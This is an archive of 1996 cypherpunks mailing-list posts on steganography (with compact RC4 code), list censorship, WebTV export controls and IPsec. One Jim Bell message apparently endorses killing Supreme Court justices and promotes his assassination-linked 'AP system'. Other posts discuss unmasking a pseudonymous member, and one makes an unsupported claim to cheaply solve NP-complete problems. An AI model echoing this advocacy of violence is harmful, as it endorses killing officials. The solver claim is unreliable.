Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sat, 9 Nov 1996 07:23:59 -0800 (PST)
To: ph@netcom.com
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <v02140b04aea905f722f8@[192.0.2.1]>
Message-ID: <199611091130.LAA00192@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Peter Hendrickson <ph@netcom.com> writes:
> > I hide the relatively small amount of data within a very large
> > amount of data which makes it impossible to find.  Data from analog
> > sources, like the "real world" (images, sounds, etc) is noisy.  This
> > is a fact of life.  Because this data is noisy I can hide
> > information in the noise.  As long as the information I am hiding
> > maintains the same statistical properties of noise it is impossible
> > to pull the information out of the data file unless you have the
> > key.  If I am paranoid enough I can make this key impossible to
> > discover without a breakthrough in factoring.
>
> Where will you keep your secret key?  Remember, when they go through
> your house they bring 20 young graduates from MIT who are just dying
> to show how clever they are and save the world at the same time.

Keep your secret key in your head.

> > This is the essence of steganography and the nature of signal and
> > noise are fundemental principles of information theory.
>
> The concept of noise is not all that well defined, however.  There
> is no way to look at a signal and say "this is all noise."
> Sometimes physical theories may lead you to believe that it is all
> noise.  That is fine for many applications, but when becomes less
> convinced of things if the consequences are severe.

Your plausible deniability has to get quite low before it will stand
up as "proof" in court.

Your real challenge is keeping your stego programs safe.  Boot
strapping a stegoed encrypted file system while leaving no stego code
lying around isn't that easy.

> >> If you are not doing it by hand, you own terrorist software and will pay
> >> the price.
> 
> > Ah yes, terrorist programs like cat and perl and operating systems like
> > Linux which contain a loopback filesystem that I can hook a perl
> > interpreter into at compile-time (which is enough for me to rewrite the
> > program from scratch each time if necessary, unless things like math
> > libraries are also outlawed on computers :)  I think that the crypto
> > concentration camps are going to be very crowded places.
> 
> Can you elaborate on this?  I am curious to know exactly what you are going
> to keep in your head and what goes on the disk.  Please post the Perl
> code that you would type in from scratch every time.

My specialty :-)

rc4 in C:

#define S,t=s[i],s[i]=s[j],s[j]=t /* rc4 key <file */
unsigned char s[256],i,j,t;main(c,v)char**v;{++v;while
(s[++i]=i);while(j+=s[i]+(*v)[i%strlen(*v)]S,++i);for(
j=0;c=~getchar();putchar(~c^s[t+=s[i]]))j+=s[++i]S;}

rc4 in perl:

#!/usr/local/bin/perl -0777-- -export-a-crypto-system-sig -RC4-3-lines-PERL
@k=unpack('C*',pack('H*',shift));for(@t=@s=0..255){$y=($k[$_%@k]+$s[$x=$_
]+$y)%256;&S}$x=$y=0;for(unpack('C*',<>)){$x++;$y=($s[$x%=256]+$y)%256;
&S;print pack(C,$_^=$s[($s[$x]+$s[$y])%256])}sub S{@s[$x,$y]=@s[$y,$x]}

The other problem I see is that if you have a stego file system in an
audio file, your disk writes are going look strange.  The inaccuracy
of disk head placement, is going to ensure that someone with the know
how will be able to copy off the last dozen pieces of data you wrote.

If they are all the same data with the exception of the LSB, it's
goint to look fishy.  Solid state storage devices are better.

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Sat, 9 Nov 1996 11:50:45 -0800 (PST)
To: Peter Hendrickson <ph@netcom.com>
Subject: Re: Black Unicorn exposed?
In-Reply-To: <v02140b03aeaa71ed1c84@[192.0.2.1]>
Message-ID: <Pine.3.89.9611091150.A9466-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain


You are making several unspoken assumptions. One such assumption is that 
S.L. vonBernhardt is Uni's real name.

-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Member JPFO. "America's Aggressive Civil Rights Organization"

On Sat, 9 Nov 1996, Peter Hendrickson wrote:

> At 11:00 AM 11/9/1996, Robert Hettinga wrote:
> > S. L. vonBernhardt, <mailto:unicorn@schloss.li>,...
> 
> Black Unicorn recently stated that had taken measures to shield
> his identity so that people would be unable to cause harm to
> his professional activities by making unsubstantiated claims
> that could scare off prospective clients.
> 
> It appears now that this protection has evaporated.  It will not
> be very hard in the future to put this information together with
> other statements people may make about Mr. Unicorn.
> 
> We are hardly operating in a hostile environment.  Yet, somebody
> who has apparently gone to some effort to have an anonymous
> identity has been exposed.  The implications of this are worth
> considering.
> 
> Peter Hendrickson
> ph@netcom.com
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 9 Nov 1996 12:00:05 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Black Unicorn exposed?
Message-ID: <199611091958.LAA14939@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:45 AM 11/9/96 -0800, Peter Hendrickson wrote:
>At 11:00 AM 11/9/1996, Robert Hettinga wrote:
>> S. L. vonBernhardt, <mailto:unicorn@schloss.li>,...
>
>We are hardly operating in a hostile environment.  Yet, somebody
>who has apparently gone to some effort to have an anonymous
>identity has been exposed.  The implications of this are worth
>considering.


It seems obvious that this exposure was entirely intentional by him.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 9 Nov 1996 11:58:50 -0800 (PST)
To: ph@netcom.com (Peter Hendrickson)
Subject: Re: A Disservice to Mr. Bell
Message-ID: <199611091958.LAA14950@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:18 PM 11/8/96 -0800, Peter Hendrickson wrote:
>At 1:32 PM 11/8/1996, jim bell wrote:
>>At 09:12 PM 11/7/96 -0800, Peter Hendrickson wrote:
>>> ...His conviction was not reversed until 1983 in the court of one
>>> Judge Patel...
>
>> However, the fact that it took 40 years to reverse (and didn't, presumably,
>> reverse the convictions of others, and didn't compensate people for lost
>> property) is yet another reason to take a few pieces out of the hide of the
>> SC, as well as a few pounds of flesh nearest the heart.
>
>Many of us are guilty of a grave disservice to Mr. Bell.  I'm sure
>that just about every reader of this list can only cringe when
>messages such as the one above cross our screens.  ("He can't be
>a paid provocateur - it would be too obvious!")
>
>Not only is Mr. Bell apparently calling for the murder of a judge, he
>is apparently calling for the murder of every justice on the Supreme
>Court of the United States!

I'm glad to see that you seem to be catching on. (although you made the 
minor error of referring to the current roster of the SC, as opposed to the 
1943 makeup.  But that's a minor point; the 1996 group have their own set of 
offenses...)

In any case,  it's really very simple:  Kidnapping used to be a capital 
offense in the US.  What the US Government did to the Japanese Americans 
during WWII was, quite simply, kidnapping. Or, at least, it would have been 
called kidnapping if it had been done by non-governmental entities.   True, 
it was done "under color of law," but ultimately it amounted to the same 
thing.   

Lawyers, who have brought hypocrisy and double-standards to a high art form, 
are taught to accept this.  And they are also taught to fight (at least a 
bit) for their clients rights.  But ultimately, they are taught to accept 
the decision of a court even if it's wrong.  Sure, they may have appeal 
rights and will occasionally exercise them, but there's no court past the SC.

It turns out, of course, that since we now all (?) accept the idea  that 
those SC decisions were simply wrong, it isn't possible to use the "they 
said it was okay" excuse.  The most of the relocations occurred before the 
decisions, which means the governmental actions were done without them.  And 
I consider a temporary (even a 40-year) approval by a group of nine clowns 
to be no more definitive than a fresh conviction that hasn't yet been 
through its first appeal.

Please note that if it were 1943 and somebody called for the death penalty 
for the perp of a kidnapping case, he'd probably be called a fine upstanding 
citizen.    

(Interestingly enough, one of the cornerstone objections a lawyer (or judge) 
might have to my "playing hardball" on this subject is their belief that 
judges should be immune from prosecution for their decisions.  The strange 
part, however, is that judicial immunity seems to be an entirely fabricated 
concept:  It appears nowhere in the US Constitution, for example.)


However, it turns out that there is a solution to this problem, the recent 
re-emergence of the "Common-law courts."   A truly fascinating subject.  
Having competed (with varying levels of disrespect on both sides) with 
so-called "Equity courts" in England since well before the 17th century, 
they frequently represented a bulwark against the misuse of royal authority. 
 Competing court systems might be considered somewhat analogous to competing 
companies in the private sector:  Monopolies breed abuse; competition 
results in better service.  There is no reason to believe that this effect 
would be any less applicable in courts than other markets.

They might merely be a historical curiousity in America, except that the 
American Revolution had the predictable effect (supported by US court 
decision, apparently) that as a consequence of George III's loss and our 
win, all powers previously vested in the King were returned to the American 
people.  Some, but by no means all of them were delegated to the Federal 
government, as the 9th and 10th amendments show.  

The really interesting part is that the authority to form common-law courts 
was never delegated to the Federal government, and (perhaps not 
surprisingly, considering recent  governmental abuses) a number of groups 
around the country have decided to form their own such commonlaw courts.  To 
American ears this will probably sound a bit like "taking the law into your 
own hands,"  but those courts are quite real and I predict they will become 
a substantially more powerful force in the next few years.  Since selection 
of judges is part of the powers originally owned by George III and lost by 
him, this means that ordinary people have the power to run those courts and 
staff them, as odd as this will feel to those of us who were brought up on 
Perry Mason et al.

Naturally, you can expect numerous lawyers and judges (all who consider 
themselves part of the competing "equity court" system, BTW) to cry foul.   
The effect is somewhat akin to a child who initially shares a communal 
sandbox with a neighbor kid, who subsequently moves away and is replaced by 
a childless couple.  After a few years of de-facto sole ownership, the 
feelings of monopoly ownership are quite real, even if in reality sharing 
must once again happen due to the arrival of new neighbors.

Interestingly enough, the one thing the Commonlaw court system needs is an 
effective enforcement system.  One likely method is the commercial lien 
process, but even that tends to be resisted by people who are far more used 
to dealing with equity court personnel.  It turns out that my AP system 
seems to mesh almost perfectly with their needs, although obviously in 
practice it would only be used as a "last resort."











Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Sat, 9 Nov 1996 12:22:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Vulis on the remailers
Message-ID: <199611092012.MAA11279@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Vulis writes:

>nobody@cypherpunks.ca (John Anonymous MacDonald) writes:
>
>> Please, remailers, source block Vulis for a week.
>> Remailer Fan
>
>I'm not sending anything via any remailers.

Hmmmm. Let's see...I'll respect you in the morning, the check is in the mail, I won't come in your mouth...

Get real, kook.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sat, 9 Nov 1996 12:13:37 -0800 (PST)
To: Cypherpunks@toad.com
Subject: Small "Hard" Problems Wanted
Message-ID: <199611092013.MAA23300@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Fellow C'Punks,

In my quest to reduce NP-Completeness to NP-Not-So-Hard-Ness, I
have just finished coding and debugging a very complicated
algorithm which manages to solve circuit satisfiability problems
of up to 1000 nodes in a few minutes and about half a meg of
memory. It works directly from the connectivity information and
the time required is not a function of the number of input bits.

Circuit satisfiability problems, and other well known problems
like Max P-Sat, are amongst the more useful canonically
NP-Complete problems, since other problems map very nicely into
them.

The algorithm is currently in APL, and I am in the process of
recoding it in C, after which I plan to test it on reduced round
DES, full 16 round DES, and some RSA problems of various sizes.

I already have C code to map RSA and n-round DES problems into an
appropriate circuit satisfiability problem and generate
appropriate input for the algorithm, so finishing up the C
version is the only remaining step before these tests can begin.

The current APL reference inplementation can still handle
problems up to about 1000 nodes, which should include a lot of
stuff for which exhaustive search would be intractable, even on
supercomputers.

Nothing I have so far fed the reference implementation has bombed
it, and I would like to make sure it is perfect before the finely
tuned C version is complete.

So if anyone has a "hard" problem they are dying to solve, which
maps into a circuit satisfiability problem that isn't over 1000
nodes, Email it to me and I will see if I can divine the answer.

I will post any interesting results to the list, of course.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 9 Nov 1996 10:28:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Who owns cypherpunks [RANT] (fwd)
Message-ID: <199611091832.MAA01034@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Jim Ray wrote:
> 
> > I'm sure John's quaking in his boots. Reread my campground analogy, and try
> > to refute it. You can't. Go start your own list with no moderation. Go start
> > a more moderated list than John's, like Perry's will be. Do whatever, but
> > this moronic thread must end!

I run several lists and have for quite a few years. In that time I have
never censored any member. I have had similar instances as to Vulis and my
responce has been and will continue to be.

"This is your problem, I have no authority to prohibit membership or
submissions of members of the list. If you wish to not see such submissions
from some party then it is your responsibility to deal with it. In short,
either unsubscribe or filter."

> Ironic, isn't it?  Jim says "this moronic thread *must* end", and yet, this very list
> that is John's *private* property is filling up with rants about censorship.  Tsk tsk.

I never said any such thing. Please quit attributing comments to me which
are untrue.

> Maybe next time they'll make it more apparent at subscription time that there's no
> assurance of free speech here!

The fact that it is 'private property' is irrelevant to this issue. Most
'presses' are private property. Trying to change the subject won't work.

As to making it clear at subscription time what the actual operating rules
are is my EXACT point. In fact you are agreeing with my position.

At the current time there are no indications at log on that this list is
considered private property, that the operator reserves the right to edit or
refuse submissions, etc. which is what makes it a 'public' list and what
makes him legaly liable for the cencorship he has enacted without warning.

I have been on this list for several years and at no point in that time have
I agreed to anything which gives the operator of the list my permission to
modify or refuse my original submissions. If he or a third party wishes to
refer to them in part or in toto in their own submissions is fine. That is
the whole point of the list.


                                                      Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sat, 9 Nov 1996 10:08:51 -0800 (PST)
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Bruce's 'Why Cryptography Is Hard' is still draft
Message-ID: <199611091805.NAA00346@homeport.org>
MIME-Version: 1.0
Content-Type: text


----- Forwarded message from Phil Agre -----

>From rre-request@weber.ucsd.edu  Sat Nov  9 05:16:00 1996
Resent-Date: Fri, 8 Nov 1996 20:50:17 -0800 (PST)
Date: Fri, 8 Nov 1996 20:50:15 -0800 (PST)
From: Phil Agre <pagre@weber.ucsd.edu>
Message-Id: <199611090450.UAA27962@weber.ucsd.edu>
To: rre@weber.ucsd.edu
Subject: notes
Resent-Message-ID: <"7C7uBC.A.H1G.I2Ahy"@weber>
Resent-From: rre@weber.ucsd.edu
Reply-To: rre-maintainers@weber.ucsd.edu
X-URL: http://communication.ucsd.edu/pagre/rre.html
X-Mailing-List: <rre@weber.ucsd.edu> archive/latest/1379
X-Loop: rre@weber.ucsd.edu
Precedence: list
Resent-Sender: rre-request@weber.ucsd.edu


Notes on network computers, blind copies, democratic culture, monopolies,
and the idea of an Internet establishment...


As a periodic reminder, a Web archive of nearly all the RRE messages ever
sent can be found through  http://communication.ucsd.edu/pagre/rre.html


It turns out that the article on cryptography by Bruce Schneier that I
forwarded from the Risks Digest the other day was actually an unfinished
draft that Peter Neumann sent out by mistake.  Bruce asks that everyone
refrain from propagating that version around the net.

----- End of forwarded message from Phil Agre -----

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 9 Nov 1996 10:20:20 -0800 (PST)
To: ph@netcom.com (Peter Hendrickson)
Subject: Re: Black Unicorn exposed?
Message-ID: <1.5.4.32.19961109181726.006c7988@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Sarah v. Bernhardt will be thrillingly laid bare in Beantown.

Swiss cheese, she flashed, foxily fluttering the lie-machine.

That "no cameras, please" is spooky-spooky tease, no dirty-looky 
pix of the Wonder Bare *ookie.

Pseudo-Actors for hire. Harvard-bred, breeding lot of the B&B
beaners.

Dirty laundrying of tropical hula-moola, you betcha your rubber 
check, get there early, to admire the hall sweepers. Keep your
eye peeled for the one-eyed one-horn in overalls using infra-red.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael H. Warfield" <mhw@wittsend.com>
Date: Sat, 9 Nov 1996 10:41:16 -0800 (PST)
To: gnu@toad.com (John Gilmore)
Subject: Re: New Linux-IPSEC mailing list for the S/WAN project
In-Reply-To: <199611090929.BAA25559@toad.com>
Message-ID: <m0vMIDo-0000uqC@wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain


John Gilmore enscribed thusly:

> I'm sending you this message because you might be interested in
> helping to build or test or document, or teach about, my S/WAN project
> to secure 5% of the net by Christmas.

> There is now a public mailing list which you can join to find out
> what's happening in the project, get the latest software for testing,
> ask questions, etc.  To join the list, send mail to:

> 	linux-ipsec-REQUEST@clinet.fi

> The email should contain a single line that just says:

> 	subscribe

> This mailing list will have discussions, not just announcements,
> and will be very technical (not political or social).

	That didn't work...  All I got back was instructions to send the
request to majordomo@clinet.fi with the single line that says:

	subscribe linux-ipsec

	Did that and it worked...

	Mike
-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 9 Nov 1996 11:32:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: exclusion/censorship and the law (fwd)
Message-ID: <199611091936.NAA01142@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Greg Broiles <gbroiles@netbox.com>
> Subject: exclusion/censorship and the law
> 
> never faced any extended scrutiny because the parties settled. Also,
> Prodigy, the defendant in Stratton Oakmont, exercised much greater
> editorial control over postings on that service, and had the ability to
> remove postings, which is something John Gilmore can't do.

He certainly can, this list runs under Majordomo which allows exactly this
kind of control if desired. I use it on my own lists and am quite familiar
with its operation. It is completely feasible for the operator to look at
EVERY submission prior to re-distribution and set the time stamp in such a
manner that there would be no evidence it ever occured.

> So my impression is that you've got the tail end of a useful concept
> (ability to control is frequently a factor used to determine liability) but
> are making far too much out of it. One really big difference I see here is
> that editorial control of the Cpunks list has occurred once (in 4? 5? years
> of the list's existence), is on a per-person not a per-message basis, and
> *does not function to restrict who can send messages but only limits Vulis'
> ability to _receive_ them on his usual system(s)*.

How often it occurs is irrelevant, this is like saying one rape is not a
crime but two is. Utter hogwash. Vulis was removed from the list, this
means he can't SUBMIT posts. This is censorship. The act was based on the
content or personality of Vulis' submissions. It was not based on a
limitation of the software, the Internet feed to the list, or the ability of
the hardware to handle more traffic. In short it was an emotionaly based
action.

> You might take a look at Mike Godwin's article on net defamation at
> <http://www.eff.org/pub/Legal/net_libel_godwin.article>; by now it's a
> little old, but I don't think anything's happened since which would change
> its reasoning. 

I have read it. I live in Austin, TX. and am quite familiar with the whole
Steve Jackson event (I was involved in it peripheraly) as well as how it
started EFF. I am currently peripheraly involved with the Austin EFF chapter
through the Austin Cypherpunks mailing list (which I host). My first
exposure to PGP was v1.0 from Adelante BBS, and I had been using and playing
vith various crypto related programs for quite few years prior to that.

> The problem with absolute statements like this is that they ignore
> important distinctions about scale - e.g., I think that it's very important
> that people, generally, be free to discuss whatever they want in private
> homes. But I also think it's very important that I be able to tell other
> people that they're not willing to discuss whatever they want in *my* home.

An action is right or wrong, irrespective of scale. If one person does it
doesn't make it any more wrong than if hundreds or millions do it. Right and
wrong are NOT scalable.

But this is not a private list. It has no warning about policies at
subscription time. It has been advertised for years as a open forum for the
discussion of crypto and speech related issues in clearly public venues.

I run a couple of 'private' lists. It is not possible for you or any other
party to become involved without agreeing before the fact to certain
editorial policies. This does not occur here. Where the 'press' is located
is irrelevant to this discussion. The point which seems to be missed is that
it takes in a single submission and then distributes multiple copies
(without editing) to ANYONE who wishes to subscribe.

In point of fact, the various articles in Mondo 2000 (back when the list
first started) and those since can be clearly interpreted as an invitation to
join the list via clearly publicly distributed medium. In effect it would be
like declaring your home an 'Open House' via the local newspaper.

> Not because I'm especially excited about censorship, but because I enjoy my
> privacy and my peace & quiet. So on the level of national rights, yes,
> unrestricted speech is an excellent thing. But on the level of my living
> room, unrestricted speech is a very bad thing. 

Then don't invite people to your house via magazines, newspapers, or Intenet.
Unrestricted speech is a good thing. Speech without personal responsibility
for the consequences is a bad thing. There were no consequences to Vulis'
speech other than the emotional impact it apparently had on the list
operator.

Personaly, I use the same standards of speech that I apply to the public at
large as I do to that small sector I explicity invite into my home. I don't
have a double standard in this regards.

> I don't think anyone who is arguing that it's fine to throw Vulis off the
> list would make the argument that it would be acceptable for the government
> to throw Vulis off of the Internet. 

Who does the throwing is irrelevant. The point is that a policy of
'hands-off' was enacted over the years and it was changed with  no warning
or opportunity for other list members to become involved. This list is a
community, it is not some individuals private property. In no way can you
successfuly argue that my email address in the subscription list qualifies
me in any way as 'property' of the list operator nor does it imply any
agreement on my part to allow that party editorial control of my submission
under the previous submission limitations (ie none).

Another aspect is that the credibility of this list as an open forum for the
discussion of crypto and speech related issues has been tarnished if not
downright lost.

As to the anarchy aspect, that has forever been lost.

> The closest thing I can see to a First Amendment argument against Gilmore
> is the "company town" argument, that the list is so much like a city or
> town that it ought to be subject to the restrictions that the First
> Amendment puts on municipalities and traditional public forums - but even
> this (rather far-out) argument got shot down a few days ago when our
> beloved Wallace of CyberPromo tried it in _Cyber Promotions v. America
> Online_. The judge said "no way", and I think that argument's a lot more
> plausible against American Online than against John Gilmore. 

It has nothing really to do with the First. It does have to do with the
agreed upon contract between the operator of the list and its subscribers.
By enacting this policy of censorship the original 'contract' (ie none) has
been broken and a new contract put in place. Had everyone received a warning
and then been unsubscribed and at the time of re-subscription a clearly
worded explanation of new policy been made available I would have no
problem. I do have a problem with arbitrary reprisals against individuals
based upon their submission content. There but by the grace of God go I (or
you).

As a matter of fact, the issues raised in both the CompuServe and Prodigy
cases did NOT revolve around the First but rather who held editorial
control. This is EXACTLY the issue here. My previous referal to ;login
is a pointer to a discussion of these two cases explicitly.

> I don't think this makes any sense. "Public list" has no special meaning.

public list = unmoderated and open to anyone

> My impression is that you're trying to make an analogy to public places
> which are privately owned like motels and lunch counters and amusement
> parks, where the owners (despite being private actors) cannot discriminate
> on the basis of race, gender, national origin, etc. (See, e.g., Civil
> Rights Act of 1964, 42 USC 1981 et seq)

Not at all. A 'public' list is a list which has no editorial policy and is
open to any party for membership. It in effect has no qualification
criteria.

> But I don't think there's any especially credible allegation that Vulis was
> discriminated against on the basis of protected class membership; nor is it
> clear that the Civil Rights Act can be extended to the operation of mailing
> lists.

Can it be extended to my operation of a paper printing press in my garage
through which I distribute pamphlets or flyers to any party which requests
them by sending me their address? If so then it applies here.

> If there's no prohibited discrimination (either because there's no
> prohibition, or there was no "discrimination" within the terms of the
> statute) then I don't see a cause of action. Wanting something you're not
> getting isn't enough. Owners of "public places" like malls or stores or
> restaurants are still free to exclude some people for non-prohibited
> reasons (like not meeting the dress code, or having behaved poorly in the
> past).

But to do this they MUST post or publish those codes in a place where a
patron can clearly see them. This was not done here.

> I am pretty disappointed to see that none of the people who profess to be
> shocked and wounded at Vulis' exclusion have bothered to set up your own
> lists. In my mind, whatever moral outrage you claim to have looks awfully
> small compared to the relatively small burden of doing something about what
> you say is bothering you. 

I run several lists including two that are crypto related (Austin
Cypherpunks and Advanced Computer Experimenters).

> I think that "cypherpunks write code" can/should be understood as a
> question, e.g., "what are you doing to change the things that bother you?" 

Among other things I am bitching about the arbitrary and unfair way this
list is being run considering the environment it was supposed to foster.


                                                   Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jon Leonard" <jleonard@divcom.umop-ap.com>
Date: Sat, 9 Nov 1996 13:57:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: WebTV a "munition"
In-Reply-To: <199611091806.KAA00144@slack.lne.com>
Message-ID: <9611092152.AA02019@divcom.umop-ap.com>
MIME-Version: 1.0
Content-Type: text


Eric Murray wrote:
> Jon Leonard writes:
> > Eric Murray wrote:
[more stuff about WebTv/crypto/export problems trimmed]
> So if their point is to fight against ITAR (one interpretation of
> the facts as I know them) why haven't they announced that they're doing so?
> It would be good PR.

I'm not sure that it would be good PR for the general public.  That's their
target market, after all.  If you've got a computer, you probably don't need
a WebTv for websurfing.

> > Given that they've tried to do everything else right (and, in my opinion,
> > succeeded), that may be all there is to it.
> > 
> > I'll ask for more details next time I talk to them.
> 
> That'd be cool.  I think that there's a lot that we don't know about this.

One of my friends at WebTv called, and I asked him about it.
What I got from him was:

1) They wanted to do it right.  (And electronic commerce needs strong crypto)
2) They wanted to be stronger than Netscape's default.  (Triple-DES, I think)
3) They didn't necessarily expect this to be a problem.
4) They expect to win the export control fight.

He seemed almost gleeful that they'd be classified as a munition.
I was suprised that he knew the issue and had an opinion, as he isn't
particularly crypto-aware usually.  I'd guess that it's a big deal
at WebTv.

Keep in mind that this is only one employee, and non-management at that.

<speculation>
It sounded like they might be vulnerable to a government deal, and
were mostly relying on the implausibility of export controlling WebTv
helping national security in any detectable way.

It seems to me that this has the potential to be a cypherpunk victory.
There's the potential for their market (and publicity) to be even wider
than Netscape's, and for the export controls to look even sillier.

Any ideas for helping their export case, or avoiding them making a deal?
</speculation>

> The web site doesn't have much hard info, just a lot of
> buzzword-compliant marketing bullstuff and the highest ratio of
> (TM)s to words that I have ever seen.

That seems to be the new advertising style in high tech.  Unfortunate.

Jon Leonard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 9 Nov 1996 11:50:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [rant] Re: Censorship on cypherpunks (fwd)
Message-ID: <199611091954.NAA01171@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 7 Nov 1996 20:42:46 -0500 (EST)
> From: "Mark M." <markm@voicenet.com>
> 
> This is why contracts are important.  There is no contract, implied or
> otherwise, to which John Gilmore is bound that forces him to protect everyone's
> "right" to be subscribed to cpunks and post whatever they want to the list.

The lack of an explicit contract detailing this is what makes it impossible
for the operator of the list to enforce such actions. When I subscribed I
gave the operator no permission to edit or otherwise control my submissions.
I also gave no permission for such submissions to be considered property by
any party other than myself. It is not possible to argue that my
subscription implied such permission.

When I subscribed to the cpunks list it was with the explicit intent of
seeing a multiplicity of views, not those views which happen to be
acceptable to the list operator.

The fact that he chooses to host the list by paying its bills is irrelevant.

If the operator wants to protect themselves legaly as well as ethicaly they
should put a notice at time of subscription detailing exactly what editorial
policies are active as well as sending a policy notification to all
currently subscribed members.


                                                     Jim Choate


ps I never saw the post about the camp ground example. If the author would
   please forward me a copy I would be happy to critique it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sat, 9 Nov 1996 12:04:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Pseudo-law on the list and libel (fwd)
Message-ID: <199611092008.OAA01186@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 7 Nov 1996 10:10:19 -0800
> From: "Timothy C. May" <tcmay@got.net>
> 
> So, if a bookstore ejects a drunken lout who is disturbing the other
> patrons, is the bookstore suddenly reclassfied as a book publisher? By your
> logic, you seem to think so.

Not at all. The drunk is not being ejected on the content of their
expression (beliefs). Vulis posed no physical or economic danger to anyone, the
operator simply could take no more of his POV. This is distinctly different
than the example you are trying to equate. In short, another straw man.

> So, if I have a party at my house and limit who I invite, or eject someone
> who is misbehaving (insulting my other guests, barfing on the floor,
> smoking when I tell him not to, whatever), you are saying that I "open
> myself up for libel suits" by other guests who don't like the things they
> hear from others at my party?

Only if you advertise the party through a public forum as open to anyone and
you are the one supplying the booze (as advertised in the ad).

The operator of this list has NEVER implicity or explicity expressed any
form of policy concerning who may subscribe to cpunks.

> So, anyone who exercises ownership rights to his property suddenly becomes
> legally responsible for the alleged misdeeds of anyone visiting his house?

My subscription to this mailing list does not imply any ownership toward its
operator. He owns the software and hardware, he does not own my thoughts or
the fact that I use this forum to distribute them. The fact he pays the
bills does not give him any right to edit or otherwise control my
submissions without an explicit warning to me prior to his acceptance of my
submission.

> Could you cite some cases supporting your point of view?

Try CompuServe and Prodigy. The logic that was used in both those cases
is 1-to-1 applicable to this.

For somebody who supposedly supports individual initiative, liberty, and
anarchy you sure rely on precedence a lot. The whole point to crypto,
Internet, and technology in general is to break the status quo not to
promote it.

> this outcome, strongly. However, it is far from establishing that a bar
> which enforces certain rules ("no shirt, no service") and which has an
> entire class of employees hired to _eject_ patrons has suddenly become
> liable for slanderous comments made by customers. And so on.)

Look at the recent 'Hooters' case involving women waitpersons.

For a business establishment to impose 'no shirt, no shoes, no service" they
MUST post such rules in a public place. This was NOT done EVER on cpunks.
Again, you are trying to equate two distinctly different cases as equivalent,
another straw man.

                                                  Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 9 Nov 1996 12:13:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: FW: Dr. Vulis (ad nauseum) (fwd)
Message-ID: <199611092017.OAA01197@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 07 Nov 1996 17:12:47 -0500
> From: camcc@abraxis.com (Alec)

> This is not a they; this is an individual with (and within) his own rights.

Who or how many own the (digital) press is irrelevant.

> Nonsense, no policy has been stated. The owner determined that the good Dr.
> had been disruptive and had become a detriment to the owner's list (and
> possibly sanity).

Exactly! With no policy and the wide advertising of this list as a open
forum for the discussion of crypto and speech related issues such action by
the list operator constitute censorship (ie editorial control) and make the
operator legaly responsible for the actions of those messages which LEAVE
